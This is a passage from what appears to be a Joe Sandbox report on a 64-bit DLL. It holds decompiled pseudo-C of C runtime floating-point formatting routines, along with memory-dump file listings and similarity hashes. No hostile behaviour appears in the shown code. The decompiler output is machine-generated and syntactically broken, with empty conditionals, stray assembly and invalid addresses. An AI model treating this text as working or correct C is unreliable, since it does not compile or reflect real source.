                                                                      				_t22 =  <  ? _t15 : 0x20;
                                                                      				r8d = 0;
                                                                      				 *((intOrPtr*)(__r9)) =  <  ? _t15 : 0x20;
                                                                      				_t16 = _t47 + 0x70; // 0xffbf
                                                                      				E00000001180055498(0, _t32 ^ _t47, _t16);
                                                                      				r10d = 0x7ff;
                                                                      				if (( *(_t47 + 0x30) >> 0x00000034 & __r10) != 0) goto 0x8004f3e2;
                                                                      			}









                                                                      0x18004f2fc
                                                                      0x18004f307
                                                                      0x18004f307
                                                                      0x18004f30f
                                                                      0x18004f316
                                                                      0x18004f320
                                                                      0x18004f327
                                                                      0x18004f331
                                                                      0x18004f338
                                                                      0x18004f33d
                                                                      0x18004f342
                                                                      0x18004f346
                                                                      0x18004f34b
                                                                      0x18004f354
                                                                      0x18004f35f
                                                                      0x18004f361
                                                                      0x18004f366
                                                                      0x18004f368
                                                                      0x18004f36d
                                                                      0x18004f372
                                                                      0x18004f383
                                                                      0x18004f38b
                                                                      0x18004f38e
                                                                      0x18004f391
                                                                      0x18004f396
                                                                      0x18004f39a
                                                                      0x18004f39f
                                                                      0x18004f3a7
                                                                      0x18004f3be

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 808467561-2761157908
                                                                      • Opcode ID: f56f59af8078ee590524fc43da97128e225f178fe4561738577511b2b190010c
                                                                      • Instruction ID: 252028ae8c255fcc82f6d6c86281c3d316ac320ff36e065d84238f58276b53d1
                                                                      • Opcode Fuzzy Hash: f56f59af8078ee590524fc43da97128e225f178fe4561738577511b2b190010c
                                                                      • Instruction Fuzzy Hash: 9FB2C1726106888BE7B68F64D980BED37A1F7483C8F619115FA0667B88DF35DB08CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E0000000118004CEC8(intOrPtr __ebx, signed int __ecx, signed int __edx, long long __rbx, signed int __r9, signed int __r10) {
                                                                      				void* __rsi;
                                                                      				void* __r13;
                                                                      				void* _t480;
                                                                      				signed long long _t507;
                                                                      				signed long long _t516;
                                                                      				unsigned int _t528;
                                                                      				intOrPtr _t535;
                                                                      				signed long long _t562;
                                                                      				unsigned int _t567;
                                                                      				intOrPtr _t574;
                                                                      				signed long long _t601;
                                                                      				void* _t608;
                                                                      				void* _t612;
                                                                      				signed int _t624;
                                                                      				signed int _t629;
                                                                      				signed int _t630;
                                                                      				signed long long _t633;
                                                                      				intOrPtr _t636;
                                                                      				signed int _t639;
                                                                      				signed long long _t668;
                                                                      				signed int _t675;
                                                                      				signed long long _t680;
                                                                      				intOrPtr _t685;
                                                                      				signed long long _t686;
                                                                      				char _t689;
                                                                      				signed int _t692;
                                                                      				signed int _t698;
                                                                      				signed int _t704;
                                                                      				signed int _t746;
                                                                      				intOrPtr _t760;
                                                                      				void* _t763;
                                                                      				void* _t764;
                                                                      				void* _t779;
                                                                      				void* _t788;
                                                                      				void* _t801;
                                                                      				void* _t809;
                                                                      				void* _t850;
                                                                      				void* _t890;
                                                                      				signed long long _t924;
                                                                      				signed long long _t934;
                                                                      				void* _t936;
                                                                      				signed long long _t946;
                                                                      				signed int _t947;
                                                                      				signed long long _t948;
                                                                      				void* _t953;
                                                                      				signed int* _t954;
                                                                      				signed long long _t958;
                                                                      				signed long long _t961;
                                                                      				long long _t971;
                                                                      				signed long long _t975;
                                                                      				signed long long _t977;
                                                                      				long long _t987;
                                                                      				void* _t1002;
                                                                      				unsigned long long _t1005;
                                                                      				signed long long _t1006;
                                                                      				void* _t1010;
                                                                      				signed long long _t1013;
                                                                      				signed long long _t1017;
                                                                      				void* _t1019;
                                                                      				void* _t1022;
                                                                      				long long _t1025;
                                                                      				signed long long _t1029;
                                                                      				signed long long _t1031;
                                                                      				signed long long _t1032;
                                                                      				void* _t1033;
                                                                      				signed long long _t1034;
                                                                      				void* _t1036;
                                                                      				signed long long _t1038;
                                                                      				char* _t1042;
                                                                      				void* _t1044;
                                                                      				void* _t1045;
                                                                      				void* _t1047;
                                                                      				signed long long _t1048;
                                                                      				signed long long _t1052;
                                                                      				signed long long _t1053;
                                                                      				signed long long _t1065;
                                                                      				signed long long _t1066;
                                                                      				signed long long _t1079;
                                                                      				signed long long _t1080;
                                                                      				signed int _t1094;
                                                                      				void* _t1104;
                                                                      				void* _t1106;
                                                                      				void* _t1112;
                                                                      				void* _t1114;
                                                                      
                                                                      				_t1094 = __r9;
                                                                      				_t639 = __ecx;
                                                                      				 *((long long*)(_t1047 + 0x18)) = __rbx;
                                                                      				_t1045 = _t1047 - 0x6c0;
                                                                      				_t1048 = _t1047 - 0x7c0;
                                                                      				_t924 =  *0x80070098; // 0xd02b0a549a3
                                                                      				 *(_t1045 + 0x6b0) = _t924 ^ _t1048;
                                                                      				 *((long long*)(_t1048 + 0x48)) =  *((intOrPtr*)(_t1045 + 0x720));
                                                                      				 *((long long*)(_t1048 + 0x60)) =  *((intOrPtr*)(_t1045 + 0x728));
                                                                      				 *(_t1048 + 0x44) = r8d;
                                                                      				 *((intOrPtr*)(_t1048 + 0x40)) = __edx;
                                                                      				asm("movsd [esp+0x38], xmm0");
                                                                      				_t1005 =  *((intOrPtr*)(_t1048 + 0x38));
                                                                      				 *((long long*)(_t1048 + 0x58)) = __r9;
                                                                      				r9d = 0x7ff;
                                                                      				asm("dec eax");
                                                                      				_t1006 = _t1005 & 0xffffffff;
                                                                      				_t958 =  ~(_t1005 >> 0x00000034 & __r9);
                                                                      				asm("sbb eax, eax");
                                                                      				r8d = r8d & r9d;
                                                                      				0x80055680();
                                                                      				E000000011800555B8(_t480, _t1005 >> 0x34);
                                                                      				asm("cvttsd2si ecx, xmm0");
                                                                      				 *((intOrPtr*)(_t1048 + 0x74)) = __ebx;
                                                                      				_t14 = _t1038 - 1; // 0x1
                                                                      				r12d = _t14;
                                                                      				asm("inc ebp");
                                                                      				r13d = r13d & _t639;
                                                                      				 *((intOrPtr*)(_t1048 + 0x78)) = __ebx;
                                                                      				 *(_t1048 + 0x20) = r13d;
                                                                      				asm("sbb edx, edx");
                                                                      				r14d = 0;
                                                                      				_t692 =  ~__edx + r12d;
                                                                      				 *(_t1048 + 0x70) = _t692;
                                                                      				if (_t1038 + 0xffffffff + r8d - 0x434 < 0) goto 0x8004d20d;
                                                                      				 *((intOrPtr*)(_t1045 + 0x318)) = 0x100000;
                                                                      				 *((intOrPtr*)(_t1045 + 0x314)) = 0;
                                                                      				 *(_t1045 + 0x310) = 2;
                                                                      				if (__ebx == 0) goto 0x8004d109;
                                                                      				r8d = r14d;
                                                                      				if ( *((intOrPtr*)(_t1045 + 0x314 + _t958 * 4)) !=  *((intOrPtr*)(_t1048 + 0x74 + _t958 * 4))) goto 0x8004d109;
                                                                      				r8d = r8d + r12d;
                                                                      				_t779 = r8d - 2;
                                                                      				if (_t779 != 0) goto 0x8004cfea;
                                                                      				r11d = _t1034 - 0x432;
                                                                      				 *(_t1048 + 0x28) = r14d;
                                                                      				r9d = r11d;
                                                                      				r8d = 0x20;
                                                                      				r11d = r11d & 0x0000001f;
                                                                      				r9d = r9d >> 5;
                                                                      				_t629 = __ebx - r12d;
                                                                      				asm("bsr eax, [esp+eax*4+0x74]");
                                                                      				r12d = _t629;
                                                                      				r12d =  !r12d;
                                                                      				if (_t779 == 0) goto 0x8004d048;
                                                                      				goto 0x8004d04b;
                                                                      				r8d = r8d - r14d;
                                                                      				if (_t1006 + __r9 - 0x73 > 0) goto 0x8004d0e5;
                                                                      				r15d = r14d;
                                                                      				r15b = r11d - r8d > 0;
                                                                      				r15d = r15d + _t692;
                                                                      				r15d = r15d + r9d;
                                                                      				if (r15d - 0x73 > 0) goto 0x8004d0e5;
                                                                      				_t763 = __r9 - 1;
                                                                      				_t33 = _t1114 - 1; // -1
                                                                      				r10d = _t33;
                                                                      				if (r10d == _t763) goto 0x8004d0c8;
                                                                      				if (r10d - r9d - _t692 >= 0) goto 0x8004d092;
                                                                      				r8d =  *(_t1048 + 0x40000000000070);
                                                                      				goto 0x8004d095;
                                                                      				r8d = r14d;
                                                                      				if (0xffffffffffffe - _t692 >= 0) goto 0x8004d09f;
                                                                      				goto 0x8004d0a2;
                                                                      				r8d = r8d & _t629;
                                                                      				r8d = r8d << r11d;
                                                                      				 *(_t1048 + 0x74 + __r10 * 4) = (r14d & r12d) >> r8d - r11d | r8d;
                                                                      				r10d = r10d - 1;
                                                                      				if (r10d == _t763) goto 0x8004d0c8;
                                                                      				_t698 =  *(_t1048 + 0x70);
                                                                      				goto 0x8004d07e;
                                                                      				if (r9d == 0) goto 0x8004d0de;
                                                                      				 *(_t1048 + 0x40000000000070) = r14d;
                                                                      				_t788 = r14d + 1 - r9d;
                                                                      				if (_t788 != 0) goto 0x8004d0d0;
                                                                      				 *(_t1048 + 0x70) = r15d;
                                                                      				goto 0x8004d0ed;
                                                                      				r15d = r14d;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				r12d = 1;
                                                                      				 *(_t1045 + 0x144) = 4;
                                                                      				 *(_t1045 + 0x140) = r12d;
                                                                      				goto 0x8004d451;
                                                                      				r11d = _t1034 - 0x433;
                                                                      				 *(_t1048 + 0x28) = r14d;
                                                                      				r9d = r11d;
                                                                      				r8d = 0x20;
                                                                      				r11d = r11d & 0x0000001f;
                                                                      				r9d = r9d >> 5;
                                                                      				_t746 = r8d - r11d;
                                                                      				_t630 = _t629 - r12d;
                                                                      				asm("bsr eax, [esp+eax*4+0x74]");
                                                                      				r12d = _t630;
                                                                      				r12d =  !r12d;
                                                                      				if (_t788 == 0) goto 0x8004d14b;
                                                                      				goto 0x8004d14e;
                                                                      				r8d = r8d - r14d;
                                                                      				if (_t1006 + __r9 - 0x73 > 0) goto 0x8004d1ed;
                                                                      				r15d = r14d;
                                                                      				r15b = r11d - r8d > 0;
                                                                      				r15d = r15d + _t698;
                                                                      				r15d = r15d + r9d;
                                                                      				if (r15d - 0x73 > 0) goto 0x8004d1ed;
                                                                      				_t764 = __r9 - 1;
                                                                      				_t57 = _t1114 - 1; // -1
                                                                      				r10d = _t57;
                                                                      				if (r10d == _t764) goto 0x8004d1cb;
                                                                      				if (r10d - r9d - _t698 >= 0) goto 0x8004d195;
                                                                      				r8d =  *(_t1048 + 0x40000000000070);
                                                                      				goto 0x8004d198;
                                                                      				r8d = r14d;
                                                                      				if (0xffffffffffffe - _t698 >= 0) goto 0x8004d1a2;
                                                                      				goto 0x8004d1a5;
                                                                      				r8d = r8d & _t630;
                                                                      				r8d = r8d << r11d;
                                                                      				 *(_t1048 + 0x74 + __r10 * 4) = (r14d & r12d) >> _t746 | r8d;
                                                                      				r10d = r10d - 1;
                                                                      				if (r10d == _t764) goto 0x8004d1cb;
                                                                      				_t704 =  *(_t1048 + 0x70);
                                                                      				goto 0x8004d181;
                                                                      				if (r9d == 0) goto 0x8004d1e1;
                                                                      				 *(_t1048 + 0x40000000000070) = r14d;
                                                                      				if (r14d + 1 != r9d) goto 0x8004d1d3;
                                                                      				 *(_t1048 + 0x70) = r15d;
                                                                      				goto 0x8004d1f5;
                                                                      				r15d = r14d;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				r12d = 1;
                                                                      				 *(_t1045 + 0x144) = 2;
                                                                      				 *(_t1045 + 0x140) = r12d;
                                                                      				goto 0x8004d451;
                                                                      				if (_t746 == 0x36) goto 0x8004d361;
                                                                      				 *((intOrPtr*)(_t1045 + 0x318)) = 0x100000;
                                                                      				 *((intOrPtr*)(_t1045 + 0x314)) = 0;
                                                                      				 *(_t1045 + 0x310) = 2;
                                                                      				if (_t630 == 0) goto 0x8004d361;
                                                                      				r8d = r14d;
                                                                      				if ( *((intOrPtr*)(_t1045 + 0x314 + _t958 * 4)) !=  *((intOrPtr*)(_t1048 + 0x74 + _t958 * 4))) goto 0x8004d361;
                                                                      				r8d = r8d + r12d;
                                                                      				_t801 = r8d - 2;
                                                                      				if (_t801 != 0) goto 0x8004d239;
                                                                      				asm("bsr eax, ebx");
                                                                      				 *(_t1048 + 0x28) = r14d;
                                                                      				if (_t801 == 0) goto 0x8004d263;
                                                                      				goto 0x8004d266;
                                                                      				r15d = r14d;
                                                                      				r8d = 0x20;
                                                                      				r8d = r8d - r14d;
                                                                      				r15b = r8d - 2 > 0;
                                                                      				r11d = r11d | 0xffffffff;
                                                                      				r15d = r15d + _t704;
                                                                      				if (r15d - 0x73 <= 0) goto 0x8004d290;
                                                                      				r15d = r14d;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				goto 0x8004d2e2;
                                                                      				_t87 = _t1114 - 1; // -1
                                                                      				_t507 = _t87;
                                                                      				if (_t507 == r11d) goto 0x8004d2dd;
                                                                      				r10d = _t507;
                                                                      				r8d = 0xffffffffffffe;
                                                                      				if (_t507 - _t704 >= 0) goto 0x8004d2ab;
                                                                      				r9d =  *(_t1048 + 0x74 + __r10 * 4);
                                                                      				goto 0x8004d2ae;
                                                                      				r9d = r14d;
                                                                      				if (r8d - _t704 >= 0) goto 0x8004d2ba;
                                                                      				goto 0x8004d2bd;
                                                                      				 *(_t1048 + 0x74 + __r10 * 4) = r14d >> 0x0000001e | __r9 * 0x00000004;
                                                                      				if (r8d == r11d) goto 0x8004d2dd;
                                                                      				goto 0x8004d299;
                                                                      				 *(_t1048 + 0x70) = r15d;
                                                                      				_t946 = _t1034 * 4;
                                                                      				_t1052 = _t946;
                                                                      				E000000011800046A0(r8d, 0, _t1045 + 0x314, _t1006, _t1052);
                                                                      				 *(_t1045 + _t946 + 0x314) = r12d << sil;
                                                                      				_t105 = _t1034 + 1; // 0x437
                                                                      				r12d = _t105;
                                                                      				r8d = r12d;
                                                                      				_t1053 = _t1052 << 2;
                                                                      				 *(_t1045 + 0x310) = r12d;
                                                                      				 *(_t1045 + 0x140) = r12d;
                                                                      				if (_t1053 == 0) goto 0x8004d451;
                                                                      				_t809 = _t1053 - _t946;
                                                                      				if (_t809 > 0) goto 0x8004d430;
                                                                      				E00000001180003FF0();
                                                                      				goto 0x8004d44a;
                                                                      				 *(_t1048 + 0x28) = r14d;
                                                                      				asm("dec eax");
                                                                      				asm("bsr eax, [esp+eax+0x74]");
                                                                      				if (_t809 == 0) goto 0x8004d379;
                                                                      				goto 0x8004d37c;
                                                                      				r15d = r14d;
                                                                      				r8d = 0x20;
                                                                      				r8d = r8d - r14d;
                                                                      				r15b = r8d - r12d > 0;
                                                                      				r11d = r11d | 0xffffffff;
                                                                      				r15d = r15d;
                                                                      				if (r15d - 0x73 <= 0) goto 0x8004d3a6;
                                                                      				r15d = r14d;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				goto 0x8004d3f4;
                                                                      				_t112 = _t1114 - 1; // -1
                                                                      				_t516 = _t112;
                                                                      				if (_t516 == r11d) goto 0x8004d3ef;
                                                                      				r10d = _t516;
                                                                      				r8d = 0xffffffffffffe;
                                                                      				if (_t516 >= 0) goto 0x8004d3c1;
                                                                      				r9d =  *(_t1048 + 0x74 + __r10 * 4);
                                                                      				goto 0x8004d3c4;
                                                                      				r9d = r14d;
                                                                      				if (r8d >= 0) goto 0x8004d3d0;
                                                                      				goto 0x8004d3d3;
                                                                      				 *(_t1048 + 0x74 + __r10 * 4) = r14d >> 0x0000001f | _t1094 + _t1094;
                                                                      				if (r8d == r11d) goto 0x8004d3ef;
                                                                      				goto 0x8004d3af;
                                                                      				 *(_t1048 + 0x70) = r15d;
                                                                      				_t961 = _t1045 + 0x314;
                                                                      				_t947 = _t1034 * 4;
                                                                      				E000000011800046A0(r8d, 0, _t961, _t1045 + 0x314, _t947);
                                                                      				 *(_t1045 + _t947 + 0x314) = r12d << sil;
                                                                      				goto 0x8004d319;
                                                                      				E000000011800046A0(r12d << sil, 0, _t961, _t1045 + 0x314, _t947);
                                                                      				E00000001180013B18(0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E00000001180013928();
                                                                      				r12d =  *(_t1045 + 0x140);
                                                                      				if (r13d < 0) goto 0x8004d8fc;
                                                                      				_t528 = 0xcccccccd * r13d >> 0x20 >> 3;
                                                                      				 *(_t1048 + 0x34) = _t528;
                                                                      				 *(_t1048 + 0x24) = _t528;
                                                                      				if (_t528 == 0) goto 0x8004d84f;
                                                                      				_t530 =  >  ? 0x26 : _t528;
                                                                      				 *(_t1048 + 0x30) =  >  ? 0x26 : _t528;
                                                                      				_t948 = _t961 * 4;
                                                                      				 *(_t1045 + 0x310) = _t1038 + _t961;
                                                                      				E000000011800046A0(_t1038 + _t961, 0, _t1045 + 0x314, _t1045 + 0x314, _t948);
                                                                      				E00000001180003FF0();
                                                                      				r10d =  *(_t1045 + 0x310);
                                                                      				if (r10d - 1 > 0) goto 0x8004d562;
                                                                      				_t535 =  *((intOrPtr*)(_t1045 + 0x314));
                                                                      				if (_t535 != 0) goto 0x8004d518;
                                                                      				r12d = r14d;
                                                                      				 *(_t1045 + 0x140) = r14d;
                                                                      				goto 0x8004d652;
                                                                      				if (_t535 == 1) goto 0x8004d652;
                                                                      				if (r12d == 0) goto 0x8004d652;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r12d) goto 0x8004d533;
                                                                      				goto 0x8004d60d;
                                                                      				if (r12d - 1 > 0) goto 0x8004d66f;
                                                                      				_t633 =  *(_t1045 + 0x144);
                                                                      				r12d = r10d;
                                                                      				 *(_t1045 + 0x140) = r10d;
                                                                      				if (0xffffffff << 2 == 0) goto 0x8004d5c8;
                                                                      				if (0xffffffff << 2 - 0xffffffff > 0) goto 0x8004d5a7;
                                                                      				_t1010 = _t1045 + 0x314;
                                                                      				E00000001180003FF0();
                                                                      				goto 0x8004d5c1;
                                                                      				E000000011800046A0(0x1cc, 0, _t1045 + 0x144, _t1010, 0xffffffff);
                                                                      				E00000001180013B18(0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E00000001180013928();
                                                                      				r12d =  *(_t1045 + 0x140);
                                                                      				if (_t633 == 0) goto 0x8004d509;
                                                                      				if (_t633 == 1) goto 0x8004d652;
                                                                      				if (r12d == 0) goto 0x8004d652;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r12d) goto 0x8004d5e3;
                                                                      				if (r8d == 0) goto 0x8004d64b;
                                                                      				if ( *(_t1045 + 0x140) - 0x73 >= 0) goto 0x8004d63c;
                                                                      				 *(_t1045 + 0x40000000000140) = r8d;
                                                                      				r12d =  *(_t1045 + 0x140);
                                                                      				r12d = r12d + 1;
                                                                      				 *(_t1045 + 0x140) = r12d;
                                                                      				goto 0x8004d652;
                                                                      				 *(_t1045 + 0x140) = r14d;
                                                                      				r12d = r14d;
                                                                      				goto 0x8004d654;
                                                                      				r12d =  *(_t1045 + 0x140);
                                                                      				if (1 != 0) goto 0x8004d834;
                                                                      				r12d = r14d;
                                                                      				 *(_t1045 + 0x140) = r14d;
                                                                      				goto 0x8004dd49;
                                                                      				 *(_t1045 + 0x4e0) = r14d;
                                                                      				r13d = r12d;
                                                                      				r13d =  <  ? r10d : r13d;
                                                                      				_t971 =  >=  ? _t1045 + 0x144 : _t1045 + 0x314;
                                                                      				_t1065 = _t1045 + 0x314;
                                                                      				 *((long long*)(_t1048 + 0x38)) = _t971;
                                                                      				r9d = r14d;
                                                                      				_t1013 =  >=  ? _t1065 : _t1045 + 0x144;
                                                                      				 *(_t1048 + 0x28) = _t1013;
                                                                      				r10d =  !=  ? r12d : r10d;
                                                                      				r12d = r14d;
                                                                      				if (r13d == 0) goto 0x8004d7da;
                                                                      				if ( *((intOrPtr*)(_t971 + 0x3ffffffffffffc)) != 0) goto 0x8004d6f1;
                                                                      				if (r9d != r12d) goto 0x8004d7ce;
                                                                      				_t197 = _t1094 + 1; // 0x1
                                                                      				r12d = _t197;
                                                                      				 *(_t1045 + 0x400000000004e0) = r14d;
                                                                      				 *(_t1045 + 0x4e0) = r12d;
                                                                      				goto 0x8004d7ce;
                                                                      				r11d = r14d;
                                                                      				r8d = r9d;
                                                                      				if (r10d == 0) goto 0x8004d7ba;
                                                                      				if (r8d == 0x73) goto 0x8004d768;
                                                                      				if (r8d != r12d) goto 0x8004d725;
                                                                      				_t202 = _t1065 + 1; // 0x1
                                                                      				 *(_t1045 + 0x4e4 + _t1034 * 4) = r14d;
                                                                      				 *(_t1045 + 0x4e0) = _t202;
                                                                      				r8d = r8d + 1;
                                                                      				 *(_t1045 + 0x4e4 + _t1034 * 4) =  *(_t1013 + 0x3ffffffffffffc);
                                                                      				r12d =  *(_t1045 + 0x4e0);
                                                                      				if (_t1065 + _t948 == r10d) goto 0x8004d768;
                                                                      				_t1017 =  *(_t1048 + 0x28);
                                                                      				goto 0x8004d705;
                                                                      				if (r11d == 0) goto 0x8004d7ba;
                                                                      				if (r8d == 0x73) goto 0x8004d65c;
                                                                      				if (r8d != r12d) goto 0x8004d791;
                                                                      				_t219 = _t1065 + 1; // 0x1
                                                                      				 *(_t1045 + 0x4e4 + _t1017 * 4) = r14d;
                                                                      				 *(_t1045 + 0x4e0) = _t219;
                                                                      				r8d = r8d + 1;
                                                                      				_t668 = r11d;
                                                                      				 *(_t1045 + 0x4e4 + _t1017 * 4) = _t668;
                                                                      				r12d =  *(_t1045 + 0x4e0);
                                                                      				r11d = _t668;
                                                                      				if (_t668 != 0) goto 0x8004d76d;
                                                                      				if (r8d == 0x73) goto 0x8004d65c;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r13d) goto 0x8004d6c6;
                                                                      				r8d = r12d;
                                                                      				_t1066 = _t1065 << 2;
                                                                      				 *(_t1045 + 0x140) = r12d;
                                                                      				if (_t1066 == 0) goto 0x8004d82d;
                                                                      				_t975 = _t1045 + 0x144;
                                                                      				_t850 = _t1066 - 0xffffffff;
                                                                      				if (_t850 > 0) goto 0x8004d80c;
                                                                      				_t1019 = _t1045 + 0x4e4;
                                                                      				E00000001180003FF0();
                                                                      				goto 0x8004d826;
                                                                      				E000000011800046A0(0x1cc, 0, _t975, _t1019, 0xffffffff);
                                                                      				E00000001180013B18(0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E00000001180013928();
                                                                      				r12d =  *(_t1045 + 0x140);
                                                                      				 *(_t1048 + 0x24) =  *(_t1048 + 0x24) -  *(_t1048 + 0x30);
                                                                      				if (_t850 != 0) goto 0x8004d485;
                                                                      				if (_t850 == 0) goto 0x8004dd49;
                                                                      				_t562 =  *0x40000180063564;
                                                                      				if (_t562 == 0) goto 0x8004d660;
                                                                      				if (_t562 == 1) goto 0x8004dd49;
                                                                      				if (r12d == 0) goto 0x8004dd49;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r10d = _t562;
                                                                      				r9d = r9d + 1;
                                                                      				_t977 = _t975 * _t948 + 0xffffffff;
                                                                      				if (r9d != r12d) goto 0x8004d890;
                                                                      				if (r8d == 0) goto 0x8004d8f0;
                                                                      				if ( *(_t1045 + 0x140) - 0x73 >= 0) goto 0x8004d660;
                                                                      				 *(_t1045 + 0x40000000000140) = r8d;
                                                                      				r12d =  *(_t1045 + 0x140);
                                                                      				r12d = r12d + 1;
                                                                      				 *(_t1045 + 0x140) = r12d;
                                                                      				goto 0x8004dd49;
                                                                      				r12d =  *(_t1045 + 0x140);
                                                                      				goto 0x8004dd49;
                                                                      				_t675 =  ~r13d;
                                                                      				 *(_t1048 + 0x30) = _t675;
                                                                      				_t567 =  *(_t1045 + 0x140) * _t675 >> 0x20 >> 3;
                                                                      				 *(_t1048 + 0x28) = _t567;
                                                                      				 *(_t1048 + 0x24) = _t567;
                                                                      				if (_t567 == 0) goto 0x8004dccc;
                                                                      				_t569 =  >  ? 0x26 : _t567;
                                                                      				 *(_t1048 + 0x34) =  >  ? 0x26 : _t567;
                                                                      				_t949 = _t977 * 4;
                                                                      				 *(_t1045 + 0x310) = (_t1038 << 2) + _t977;
                                                                      				E000000011800046A0((_t1038 << 2) + _t977, 0, _t1045 + 0x314, _t1019, _t977 * 4);
                                                                      				E00000001180003FF0();
                                                                      				r10d =  *(_t1045 + 0x310);
                                                                      				if (r10d - 1 > 0) goto 0x8004d9ff;
                                                                      				_t574 =  *((intOrPtr*)(_t1045 + 0x314));
                                                                      				if (_t574 != 0) goto 0x8004d9bb;
                                                                      				r15d = r14d;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				goto 0x8004dad2;
                                                                      				if (_t574 == 1) goto 0x8004dad2;
                                                                      				if (r15d == 0) goto 0x8004dad2;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r15d) goto 0x8004d9d6;
                                                                      				goto 0x8004da9c;
                                                                      				if (r15d - 1 > 0) goto 0x8004daf2;
                                                                      				_t636 =  *((intOrPtr*)(_t1048 + 0x74));
                                                                      				r15d = r10d;
                                                                      				 *(_t1048 + 0x70) = r10d;
                                                                      				if (0xffffffff << 2 == 0) goto 0x8004da5d;
                                                                      				if (0xffffffff << 2 - 0xffffffff > 0) goto 0x8004da3e;
                                                                      				_t1022 = _t1045 + 0x314;
                                                                      				E00000001180003FF0();
                                                                      				goto 0x8004da58;
                                                                      				E000000011800046A0(0x1cc, 0, _t1048 + 0x74, _t1022, 0xffffffff);
                                                                      				E00000001180013B18(0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E00000001180013928();
                                                                      				r15d =  *(_t1048 + 0x70);
                                                                      				if (_t636 == 0) goto 0x8004d9ae;
                                                                      				if (_t636 == 1) goto 0x8004dad2;
                                                                      				if (r15d == 0) goto 0x8004dad2;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r15d) goto 0x8004da78;
                                                                      				if (r8d == 0) goto 0x8004dacd;
                                                                      				if ( *(_t1048 + 0x70) - 0x73 >= 0) goto 0x8004dac0;
                                                                      				 *(_t1048 + 0x40000000000070) = r8d;
                                                                      				r15d =  *(_t1048 + 0x70);
                                                                      				r15d = r15d + 1;
                                                                      				 *(_t1048 + 0x70) = r15d;
                                                                      				goto 0x8004dad2;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				r15d = r14d;
                                                                      				goto 0x8004dad4;
                                                                      				r15d =  *(_t1048 + 0x70);
                                                                      				if (1 != 0) goto 0x8004dcad;
                                                                      				 *(_t1048 + 0x70) = r14d;
                                                                      				goto 0x8004ddc6;
                                                                      				 *(_t1045 + 0x4e0) = r14d;
                                                                      				r13d = r15d;
                                                                      				r13d =  <  ? r10d : r13d;
                                                                      				_t987 =  >=  ? _t1048 + 0x74 : _t1045 + 0x314;
                                                                      				_t1079 = _t1045 + 0x314;
                                                                      				 *((long long*)(_t1048 + 0x50)) = _t987;
                                                                      				r9d = r14d;
                                                                      				_t1025 =  >=  ? _t1079 : _t1048 + 0x74;
                                                                      				 *((long long*)(_t1048 + 0x38)) = _t1025;
                                                                      				r10d =  !=  ? r15d : r10d;
                                                                      				r15d = r14d;
                                                                      				if (r13d == 0) goto 0x8004dc59;
                                                                      				if ( *((intOrPtr*)(_t987 + 0x3ffffffffffffc)) != 0) goto 0x8004db70;
                                                                      				if (r9d != r15d) goto 0x8004dc4d;
                                                                      				_t331 = _t1094 + 1; // 0x1
                                                                      				r15d = _t331;
                                                                      				 *(_t1045 + 0x400000000004e0) = r14d;
                                                                      				 *(_t1045 + 0x4e0) = r15d;
                                                                      				goto 0x8004dc4d;
                                                                      				r11d = r14d;
                                                                      				r8d = r9d;
                                                                      				if (r10d == 0) goto 0x8004dc39;
                                                                      				if (r8d == 0x73) goto 0x8004dbe7;
                                                                      				if (r8d != r15d) goto 0x8004dba4;
                                                                      				_t336 = _t1079 + 1; // 0x1
                                                                      				 *(_t1045 + 0x4e4 + _t1034 * 4) = r14d;
                                                                      				 *(_t1045 + 0x4e0) = _t336;
                                                                      				r8d = r8d + 1;
                                                                      				 *(_t1045 + 0x4e4 + _t1034 * 4) =  *(_t1025 + 0x3ffffffffffffc);
                                                                      				r15d =  *(_t1045 + 0x4e0);
                                                                      				if (_t1079 +  *((intOrPtr*)(_t1048 + 0x48)) == r10d) goto 0x8004dbe7;
                                                                      				_t1029 =  *((intOrPtr*)(_t1048 + 0x38));
                                                                      				goto 0x8004db84;
                                                                      				if (r11d == 0) goto 0x8004dc39;
                                                                      				if (r8d == 0x73) goto 0x8004dadc;
                                                                      				if (r8d != r15d) goto 0x8004dc10;
                                                                      				_t353 = _t1079 + 1; // 0x1
                                                                      				 *(_t1045 + 0x4e4 + _t1029 * 4) = r14d;
                                                                      				 *(_t1045 + 0x4e0) = _t353;
                                                                      				r8d = r8d + 1;
                                                                      				_t680 = r11d;
